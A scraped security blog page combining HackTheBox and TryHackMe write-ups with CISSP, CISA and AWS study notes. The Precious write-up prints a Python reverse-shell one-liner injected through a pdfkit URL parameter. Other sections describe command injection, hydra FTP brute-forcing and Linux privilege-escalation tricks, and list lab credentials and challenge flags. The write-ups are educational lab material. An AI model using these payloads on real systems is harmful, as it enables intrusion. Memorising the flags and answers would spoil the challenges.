HackTheBox – Keeper

User Flag

Ater adding the target machine in /etc/hosts we conducted a NMAP scan.

While accessing the IP over browser we got the following URL.

After adding this URL in the /etc/hosts file we tried to access the URL.

We tried to brute force the credentials manually and the following credential set worked.

root:password

Upon enumeration we found 2 users

While checking details for user lnorgaard we found an interesting comment.

New user. Initial password set to Welcome2023!

So we have the username,password and the IP address.

Username: lnorgaard

Password: Welcome2023!

IP: 10.10.11.227

As per the nmap scan we say that ssh port is enabled.

So we have all the required information to connect the machine via ssh.

After connecting via ssh we got the user flag,

Root Flag

Here we have a RT30000.zip file. Let’s unzip it.

To copy the files from remote to local machine we are using a web server.

Looking at those files we found 2 interesting files.

KeePassDumpFull.dmp

Passcodes.kdbx

Upon googling, I found these 2 URLs useful.

https://github.com/CMEPW/keepass-dump-masterkey

https://github.com/vdohney/keepass-password-dumper

Master password: rødgrød med fløde

Using the master password we opened passcodes.kdbx in keepass application.

Below are the details for root.

Using putty we accessed the root over ssh and got the root flag.

Security Measures

  1. Using secure credentials.
  2. Set rate limit to reduce brute force.
  3. Information Disclosure – Critical information like passwords should not be disclosed.
  4. Critical files should not be accessed by normal users unless required.

HackTheBox – Photobomb

NMAP Scanning

Added address in /etc/hosts and open the web page

Upon clicking the link it asks for credentials.

As we do not have any credentials I got the page below.

I tried to view the source code and found the photobomb.js file.

After opening that file I got the credentials.

Username: pH0t0

Password: b0Mb!

I logged in using the above credentials.

Upon logging using above credentials we saw it is an image downloading service.

So we intercepted the request and began testing of all 3 parameters. I have enabled the http.server and tried to inject a curl command.

For the photo parameter I got the response and it seems that it is not vulnerable.

For the filetype parameter I got the response on our server. So this might be vulnerable.

So I decided to generate a reverse shell command and enabled netcat.

After injecting the above snippet I got the user shell.

I got the user flag.

Privilege Escalation

I began with the sudo -l command and checked the cleanup.sh file.

Add /bin/bash in cd file and give all permissions

I also create find file because if one failed we have backup to get shell as root

Now just run that file with sudo permission and set the PATH to /temp directory

I got root.

HackTheBox – Precious

NMAP Scanning

Add website to hosts file:

Open the web service

This website takes a web page URL and converts it into PDF.

On examining the pdf, it shows that it is using pdfkit v0.8.6 version

On searching we found vulnerability for mentioned version

On studying the POC it looks like the URL parameter is used to execute RCE.

Lets try with command whoami

Lets use the below exploit to gain remote access.

http://10.10.14.22/?name=%20′ python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.14.22”,9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)”

On enumerating we found a file that contains username and passwords.

henry:Q3c1AqGHtoI0aXAYFH

User Flag

We logged into the system and upon enumeration we got the user flag.

Privilege Escalation

Using command sudo -l, we got the following results

https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/

https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml

Using above mentioned URLs we modified the dependencies.yml file and got the root access.

Upon enumeration we got the root flag.

Domain 2: Asset Security

  1. Asset Types
  2. Asset Classification
  3. Asset Storage
  4. Asset Security
  5. Data Classification
  6. Type of Data
  7. Data Stakeholders
  8. Data Remanence
  9. Data Destruction
  10. Scoping
  11. Tailoring
  12. Tokenization
  13. Anonymization
  14. Data Security
  15. Cloud Access Security Broker (CASB)
  16. Data Loss Prevention (DLP)

Asset Types

  • Tangible – anything you can physically touch. For e.g.: Laptops, Buildings
  • Intangible – anything of value that you can’t physically touch. For e.g.:
    • Trademarks
    • Trade Secrets
    • Copyrights
    • Patents

Asset Classification

  • Personally Identifiable Information – Can be used to distinguish an individual’s identity 
  • Personal Health Information – Processed by health organizations, schools, employer
  • SPI 

Asset Storage

Apply appropriate controls based on classification 

  • Encryption – AES256 
  • Physical Security
    • Safes 
    • Secure Rooms 
    • Cabinets 
    • HVAC 

Data is more valuable than the media 

  • Buy high quality media 
  • Buy media with built-in security

Asset Security

  • EOL – OEM will no longer manufacture a particular product
  • EOS – OEM will no longer provide service to a particular product

Data Classification

  • Confidential – Disclosure = damage 
  • Top Secret – Disclosure = exceptionally grave damage
  • Secret – Disclosure = serious damage
  • Private – Disclosure = grave damage
  • Public – Disclosure = no damage

Type of Data

  • Data at rest – Stored on media. E.g. data stored in hard drive
    • Controls – Symmetric Encryption
  • Data at motion – Moving across a network
    • Controls – Transport Encryption
  • Data in use – Data in temporary storage buffer while being used
    • Controls – Purging after use

Data Stakeholders

  • Business Owner – Senior executive that makes policy to govern data security
  • Data Owners – Management level who owns the data
  • Data Custodians – Technical people who do configurations
  • System Owner – Person who owns the hardware where data is kept

Data Remanence

Data left over after a removal and deletion process

Data Destruction

  • Shredding – Shred to 2 mm
  • Degaussing – Degaussing don’t work on SSD
  • Overwriting
  • Purging

Scoping

Portion of standards that will be applicable for organization

Tailoring

Customizing standards as per the organization’s need.

Tokenization

Using random string of characters in place of actual data

Anonymization

Process of removing all relevant data so that it is theoretically impossible to identify the original subject

Data Security

Digital Rights management

Protects copyright data by:

DRM license

  • License grants access to product and terms of use
  • Contains decryption key to access the product
  • Used for: Music, books,etc.

Cloud Access Security Broker (CASB)

Sits between cloud app users and cloud services to control access.

  • Network Based – Intercepts traffic to monitor and take actions
  • API Based – Blocks unauthorized queries via API

Data Loss Prevention (DLP)

Works using various mechanisms:

  • Pattern matching – Detects specific regular expressions and takes action as per the defined rule
  • Keyword based – Detects specific keyword like SPI, PII, etc. and block the communication
  • Network Based – Restrict email and other network sharing mechanisms
  • Endpoint based – Restricts copy and printing of data

Domain 1: Security and Risk Management

CIA Triad:

  1. Confidentiality (C): Resources should be protected from unauthorized access
  2. Integrity (I): Resources should be protected from unauthorized modification 
  3. Availability (A): Resource should be accessible to authorized parties

IAAA:

  1. Identification: Action owner identifies themselves
  2. Authentication: Action owner proves their identity
  3. Authorization: The action owner is allowed/disallowed to perform an action
  4. Auditing: The action owner’s actions are logged

Accounting: 

The action owner logs are reviewed for violations

Non-repudiation: 

The action owner cannot deny his/her actions

Governance(Not us):

  • Decided by C – level(CISO, CFO, etc.) executives
  • Sets direction for the organization on the basis of prioritization and decision-making
  • Monitors performance and compliance
  • Decides risk appetite

Management(Us):

  • Plans to implement directions on governance
  • Minimize risk to the tolerance level

Principle:

There are 2 types of principles:

  1. Top Down:
    • Works on the directions given by upper management.
    • Everything is done with the support of upper management
    • Good for the security implementation
  2. Bottom Up:
    • Works on the demands and requests given by staff
    • Bad for security.

Standards and Frameworks

There are many security frameworks and standards available for security implementation and guidance for any organization. A few examples are

  1. PCI DSS: Mostly used for financial organizations that hold payment card-related details.
  2. COBIT
  3. ITIL
  4. ISO 27001
    • This is given by the International Organisation of Standards(ISO) for Information Security Management Systems (ISMS).
    • Follows a risk-based approach.
    • Monitors using PDCA cycle.
      • Plan
      • Do
      • Check
      • Act
  5. ISO 27002: Focuses on the implementation of ISO 27001.
  6. ISO 27005: Risk management
  7. ISO 27799: Protection of Personal Health Information (PHI)

Protection Methods

  1. Defense in Depth
    • Multiple layers of security
    • Includes physical, administrative, and logical controls
      • Physical: Guards, fence, CCTV
      • Administrative: Policies and Procedures
      • Logical: Firewall, IDPS
    • Improves CIA
  2. Encryption: Makes data unreadable to unauthorized subjects
  3. Data Hiding: Hides data for unauthorized users

Security Governance Principles

Types of Plan:

  1. Strategic Plan
    • 3 to 5 years
    • Decide by Governance
    • Plans mission, vision, and goals
  2. Tactical Plan
    • 1 year
    • Project Management, Hiring, etc.
  3. Operational Plan
    • Few months
    • Comprise of methods to achieve the tactical plan

Laws

There are various types of laws:

  1. Criminal Law
    • Violation of criminal law.
    • Evidence should be “Beyond a reasonable doubt”
    • Punishment may be in the form of fines, jail or both.
  2. Civil Law
    • Contract Disputes between entities
  3. Administrative Law
    • Laws by government agencies

Regulations

  1. Computer Fraud and Abuse Act 1986 (CFAA)

Due Care

Mostly a plan to be comply with all applicable regulations and also look if there is any failure to comply any regulation

Due Diligence

It is the effort to maintain the due care. It can include VAPT, security reviews and audits, etc.

Intellectual Property

Copyright

It is mostly for the protection of art or software. It prevents copying the original softwares. It is indicated by © symbol.

Trademark

It is usually logos, names, etc. indicated by ™ symbol and indicated by ® symbol if registered.

Patent

It is used to protect inventions. For eg: Medicines

Trade Secrets

These are the organization’s trade secrets which helps in succeeding them. For eg: A special recipe

Import/Export Restrictions

Third Party Security

  1. Service Level Agreement (SLA): Agreement to provide certain level of service
  2. Right to penetration test and audit

Vendor, Consultants, Contractors, Outsourcing and Offshoring

They should at least follow organization security methods.

Acquisitions

One organization has acquired another organization

Divestiture

The organization is split up.

Security Documents

  1. Policy
    • Mandatory
    • High level – Not specific to technology
    • Comprise of regulatory, advisory and informational points
  2. Standards
    • Mandatory
    • Specific use of technology
  3. Guidelines
    • Non mandatory
    • Usually contains recommendation on how to implement
  4. Procedures
    • Mandatory
    • Low level
    • Step by step methods to implement
  5. Baseline
    • Mandatory
    • Minimum acceptable requirement

User Security

Personnel/user security is basically securing employees. This can be achieved by:

  1. Awareness
  2. Training
  3. Hiring
    • Background checks
    • Non Disclosure Agreement
  4. Termination
    • Lock the account, never delete.

Access Control

Categories:

  1. Administrative
    • Policies and procedures
    • Regulations
    • Training
  2. Technical
    • Hardware, software and firmware
    • Encryption
  3. Physical
    • Locks, fences, etc.
    • Guard, Dogs, etc.

Types:

  1. Preventive: Least Privilege, IPS, firewall
  2. Detective: IDS, CCTV
  3. Corrective: Antivirus, Patching
  4. Recovery: DR, Backup
  5. Deterrent: Fence, Guards
  6. Compensating

Risk Management

Risk = Threat * Vulnerability

Steps:

  1. Identification
    • Asset
      • Tangible: Physical Hardware, Anything you can touch
      • Intangible: Data, trade secrets, etc.
    • Team
    • Scoping
    • Tools
    • Methods
    • Risk Appetite
  2. Assessment
    • Quantitative
    • Qualitative
    • Cost Benefit Analysis
    • Mitigation/Transfer/Acceptance/Avoidance
    • Risk rejection is not acceptable

Total Risk = Threat * Vulnerability*Asset Value

Qualitative Risk Assessment

Risk Matrix

Quantitative Risk 

Risk registers can be used to monitor the risk.

Risk Analysis

Single Loss Expectancy(SLE) = Asset Value(AV) * Exposure Factor(EF)

Annual Loss Expectancy(ALE) = Annual Rate of Occurrence (ARO) * Single Loss Expectancy(SLE)

Key Goal Indicators (KGI)

Defines a measure that tells management whether a goal has been achieved.

Key Performance Indicators (KPI)

Define actions that determine how well the processes are performing to reach the goal.

Key Risk Indicators (KRI)

Metrics that determine the risk organization is facing.

Risk response and mitigation

  1. Mitigation
  2. Transfer
  3. Acceptance
  4. Avoidance

Update risk registers with mitigations to get the risk to an acceptable level.

Business Continuity Planning

Comprise of:

  • Continuity of operations plan
  • Crisis communication plan
  • Critical infrastructure protection plan
  • Cyber incident response
  • Disaster Recovery Plan
  • Information system contingency plan
  • Occupant emergency plan

The NIST 800-34 can be followed as the standard.

Explain benefits of BCP

  • Cost of disaster
  • Regulatory requirements
  • Legal consequences
  • Loss of customer trust

Business Impact Analysis

Identify critical and non critical assets

Recovery Point Objective (RPO) – Maximum amount of data the organization can tolerate losing.

Maximum Tolerable Downtime (MTD) – Amount of time mission/business process can be disrupted without causing significant harm.

Recovery Time Objective (RTO) – Maximum length of time it should take to restore normal operations following an outage or data loss.

Work Recovery Time (WRT) – Time required to configure a recovered system.

MTD >= RTO + WRT

Mean Time Between Failures (MTBF) – How long will a new/repaired asset will function.

Mean Time To Repair (MTTR) – How long it takes to recover a failed system.

Minimum Operating Requirement (MOR) – Minimum requirement for our critical system to function.

Threat Intelligence

Set of activities that an organization undertakes to educate itself about changes in the cyber security threat landscape, and adapt security controls based upon threat information.

Mostly available on Open Source platforms.

Approaches:

  • Focused on Assets – Protect valuable assets 
  • Focused on Attackers – Protect the things that attackers want to attack 
  • Focused on Software – Protect the software

Threat Hunting

Approach to seek Indicators of Compromise (IOC) on network.

IOC can be of various types:

  • Unused file, processes
  • Log entries
  • Unapproved actions

STRIDE 

  • Spoofing – Falsifying information to gain access 
  • Tampering – Making unauthorized changes 
  • Repudiation – Denying having done an action 
  • Information Disclosure – Revelation of controlled information 
  • Denial-of-Service – Prevents the use of an asset 
  • Escalation of Privilege – Elevates capability of under privileged account

Supply Chain Risk Management (SCRM)

Vendor should perform security activities as organization follow in their environment.

Phases:

  1. Vendor Selection – Request for Proposal (RFP)
  2. Onboarding – Verification of contracts
  3. Monitoring – Ensure security is followed.
  4. Offboarding – Data disposal

Agreements

  • Non Disclosure Agreement (NDA)
  • Service Level Requirements (SLR)
  • Service Level Agreements (SLA) – Penalties
  • Memorandum of Understanding (MOU)
  • Business Partnership Agreement (BPA)
  • Statement of Work (SOW)

Audits and Assessments

  • Scope
  • Internal Auditors – Reports to executives
  • External Auditor
  • Gap Analysis

Cloud Audits

SOC Reports

Common Linux Privilege Escalation

Used room: https://tryhackme.com/room/commonlinuxprivesc

Privilege Escalation is a practice. It mainly depends upon configuration done in the system that acts as a weakness to escalate the privileges.

These configurations can be of many types. For e.g.:

  1. Weak credentials
  2. Improper access management
  3. Not following best practices, etc.

So, today or tonight we will see various methods to do privilege escalation in Linux.

Step 1: Enumerate the machine

Tools

  1. LinEnum: https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

SSH into the target machine

What is the target’s hostname?

Checking hostname:

Use command hostname:

Look at the output of /etc/passwd how many “user[x]” are there on the system?

Check the number of users using cat /etc/passwd

8 users are there present.

How many available shells are there on the system?

Using command: cat /etc/shells

4 shells are available.

What is the name of the bash script that is set to run every 5 minutes by cron?

Using command: cat /etc/crontab

autoscript.sh

What critical file has had its permissions changed to allow some users to write to it?

passwd

After running LinEnum we found a lot of info to answer the following questions:

Method 1 – Finding and Exploiting SUID Files

The first step in Linux privilege escalation exploitation is to check for files with the SUID/GUID bit set. These are the files that can be run with the permissions of the file(s) owner/group. In this case, as the super-user.

What is a SUID binary?

In Linux, everything is a file, including directories and devices which have permissions to allow or restrict three operations i.e. read, write and execute. So when you set permission for any file, you should be aware of the Linux users to whom you allow or restrict all three permissions.

Take a look at the following demonstration of how maximum privileges (rwx-rwx-rwx) look:

r = read

w = write

x = execute

user     group     others

rwx       rwx       rwx

421       421       421

The maximum number of bits that can be used to set permission for each user is 7, which is a combination of reading (4) write (2), and execute (1) operation.

For example, if you set permissions using “chmod” as 755, then it will be rwxr-xr-x.

But when special permission is given to each user it becomes SUID or SGID. When extra bit “4” is set to the user(Owner) it becomes SUID (Set user ID) and when bit “2” is set to group it becomes SGID (Set Group ID).

Therefore, the permissions to look for when looking for SUID is:

SUID:

rws-rwx-rwx

GUID:

rwx-rws-rwx

Finding SUID Binaries

We already know that there are SUID capable files on the system, thanks to our LinEnum scan. However, if we want to do this manually we can use the command: “find / -perm -u=s -type f 2>/dev/null” to search the file system for SUID/GUID files. Let’s break down this command.

find – Initiates the “find” command

/ – Searches the whole file system

-perm – searches for files with specific permissions

-u=s – Any of the permission bits modes are set for the file. Symbolic modes are accepted in this form

-type f – Only search for files

2>/dev/null – Suppresses errors

What is the path of the file in user3’s directory that stands out to you?

Well, “shell” is a SUID bit file, which means running it will run the script as a root user.

Method 2 – Exploiting a writable /etc/passwd

We saw that /etc/passwd for writable. So, what we will do is, create a new root user and get it listed in the /etc/passwd file.

Now logging into this user:

We are root.

Method 3 – Sudo – l

This command helps you to find commands which can be run as root without using the password.

vi can be run as sudo without password.

I opened vi as sudo using “sudo vi” command and exit the file using “:!sh as shown below.

Upon exit it will redirect you to a shell:

Now you are root.

Method 4 – Exploiting using Crontab

The Cron daemons are processes that run commands at specific dates and times which helps us schedule activities. We can create a crontab file containing commands and instructions that will be executed by the Cron daemon.

How to view active Cronjobs.

We can use the command “cat /etc/crontab” to view what cron jobs are scheduled.

Understanding the syntax of Cronjob

Cronjobs exist in a certain format, being able to read that format is important if you want to exploit a cron job. 

# = ID

m = Minute

h = Hour

dom = Day of the month

mon = Month

dow = Day of the week

user = What user the command will run as

command = What command should be run

* = All

For Example,

#mhdommondowusercommand
15*1***rootcd / && run-parts –report /etc/cron.hourly

How can we exploit this?

We know from our LinEnum scan, that the file autoscript.sh, on user4’s Desktop is scheduled to run every five minutes.

It is owned by root, meaning that it will run with root privileges, despite the fact that we can write to this file. The task then is to create a command that will return a shell and paste it into this file. When the file runs again in five minutes the shell will be running as root.

What directory is the “autoscript.sh” under?

/home/user4/Desktop

Let’s change the contents of file autoscript.sh to the mentioned payload

And start the listener

Wait for a few minutes as the cronjob will execute the autoscript.sh and hopefully we will be getting a shell vis nc listener.

Finally, we got the shell.

Method 5 – Exploiting PATH variable

What is PATH?

PATH is an environmental variable in Linux and Unix-like operating systems which specifies directories that hold executable programs. When the user runs any command in the terminal, it searches for executable files with the help of the PATH Variable in response to commands executed by a user.

It is very simple to view the Path of the relevant user with help of the command “echo $PATH”.

How does this let us escalate privileges?

Let’s say we have a SUID binary. Running it, we can see that it’s calling the system shell to do a basic process like list processes with “ps”. Unlike in our previous SUID example, in this situation we can’t exploit it by supplying an argument for command injection, so what can we do to try and exploit this?

We can re-write the PATH variable to a location of our choosing! So when the SUID binary calls the system shell to run an executable, it runs one that we’ve written instead!

As with any SUID file, it will run this command with the same privileges as the owner of the SUID file! If this is root, using this method we can run whatever commands we like as root!

After seeing the above snap we observed that ./script is performing the ls command.

So we changed the value for ls as below procedure

And on executing the ./script again we got the shell.

This concludes with some basic methods to escalate privileges in Linux.

Net Sec Challenge

What is the highest port number being open less than 10,000?

8080

There is an open port outside the common 1000 ports; it is above 10,000. What is it?

10021

How many TCP ports are open?

6

What is the flag hidden in the HTTP server header?

THM{web_server_25352}

What is the flag hidden in the SSH server header?

THM{946219583339}

We have an FTP server listening on a nonstandard port. What is the version of the FTP server?

vsftpd 3.0.3

We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?

hydra -l eddie -P /usr/share/wordlists/rockyou.txt ftp://10.10.93.153:10021

hydra -l quinn -P /usr/share/wordlists/rockyou.txt ftp://10.10.93.153:10021

THM{321452667098}

Browsing to http://10.10.93.153:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?

THM{f7443f99}

Happy Hacking !!!

Risk Assessment and Audit Charter

Risk Assessment

The whole CISA exam works around the concepts of risk assessment methodology. ISACA expects aspirants to have deep knowledge of terms in risk assessment.

What is risk?

A probability or threat of damage, injury, liability, loss or any other negative occurrence that is caused by external or internal vulnerabilities and that may be avoided through preventive action.

Elements of risk:

Risk is mainly comprise of probability and impact and mostly formulated using below formula:

Risk(R) = Probability(P) * Impact(I)

Both the terms are equally important while determining risk. Let us understand with an example. Probability of damage of a product is very high, let say 1, however that product hardly costs anything and hence Impact is Nil i.e. zero even if the product is damaged.

So risk of rain on articles will be:
Risk = P * I
i.e. Risk = 1 * 0 = 0

Vulnerability & Threat

Vulnerability means weakness and threat means something that can exploit the weakness. By using these term we have another formula for risk.

R = Vulnerability(V) * Threat(T)

For exam just remember below 2 formulae:

R = P * I

&

R = Asset Value(A) * V * T

Risk matrix

Risk matrix shows how the severity of risk is aligned with likelihood/probability and impact.

Steps for risk assessment (2 questions will be there):

Step 1: Identify Critical Assets/Processes.

Step 2: Identify relevant risks.

Step 3: Do impact analysis.

Step 4: Risk prioritization

Step 5: Risk Treatment

What is threat?

A threat is what we’re trying to protect against. Our enemy could be floods, fire, hackers, malware, criminals and many other unknown forces. Threats are not in our control.

What is vulnerability?

Vulnerability is a weakness or gap in our protection. Vulnerability can be in form of weak coding, missing anti-virus, weak access control and other related factors. Vulnerabilities can be controlled by us.

Types of Risk:

  • Inherent Risk: The risk that an activity would pose if no controls or other mitigating factors were in place.
  • Residual Risk: The risk that remains after controls are taken into account.
  • Detection Risk: Risk that the auditors fail to detect a material misstatement in the financial statements.
  • Control Risk: Risk that a misstatement could occur but may not be detected and corrected or prevented by entity’s internal control mechanism
  • Audit Risk: Inherent Risk x Control Risk x Detection Risk

Risk Treatment:
Once risks have been identified and assessed, all techniques to manage the risk fall into one or more of these four major categories:

  • Risk Mitigation/Risk Reduction – In this the risk gets mitigated in a functionality.
  • Risk Avoidance – In this the risky functionality is dropped or removed.
  • Risk Acceptance – In this the risky functionality is used keeping the particular risk in mind.
  • Risk Transfer – In this the risk is transferred to the third party (mostly insurance) that takes care of the risk.

Audit Charter

Audit charter is a formal document that defines audit’s purpose, authority and position in an organization.

Characteristics of Audit Charter:

  • Most of the times an audit charter is approved by Top Management or highest level of the organization and should be approved by Audit committee too.
  • Audit charter is not dynamic in nature and should be changed with proper justification.
  • The audit function must be independent of the business function and should have direct access to the audit committee of the board.

AWS Messaging and Integration Services

Simple Queue Service (SQS)

SQS is a message queuing service that allows you to build loosely coupled systems.

Features:
  1. Allows component-to-component communication using messages.
  2. Messages are processed in an asynchronous manner.
  3. Multiple components can add messages to the queue.
  4. Helps to improve performance and scalability.

Important for the exam:

  1. Queues are processed in FIFO order.
  2. Supports loose coupling.

AWS Infrastructure as Code (IaC)

IaC allows you to write a script to provision AWS resources. The benefit is that you provision resources in a reproducible manner that saves time.

CloudFormation

CloudFormation allows you to provision AWS resources using IaC.

Features:
  1. Provides a repeatable process for provisioning resources.
  2. Works with most AWS services.
  3. Create templates for the resources you want to provision.
  4. Automate the creation of EC2 instances in your AWS account.

Elastic Beanstalk

Elastic Beanstalk allows you to deploy your web applications and web services to AWS.

Features:
  1. Orchestration service that provisions resources.
  2. Monitors application health via a health dashboard.
  3. Automatically handles the deployment.
  4. Helps in capacity provisioning, load balancing and, auto-scaling.

OpsWorks

OpsWorks allows you to use Chef or Puppet to automate the configuration of your servers and deploy code.

Features:
  1. Deploy code and manage applications.
  2. Manage on-premises servers or EC2 instances in AWS Cloud.
  3. Works with Chef and Puppet automation platforms.
  4. Automate installation scripts and configuration.

Important for the exam:

  1. CloudFormation supports infrastructure automation using IaC.
  2. Elastic Beanstalk is only used to deploy applications to the AWS cloud- it is not used to deploy applications on-premises.
  3. OpsWork can deploy applications on-premises, and it also automates infrastructure management using Chef or Puppet.

Information Security Blogs

Blogs on infosec and cyber security, writeups, latest trends, security best practices, etc.

Skip to content ↓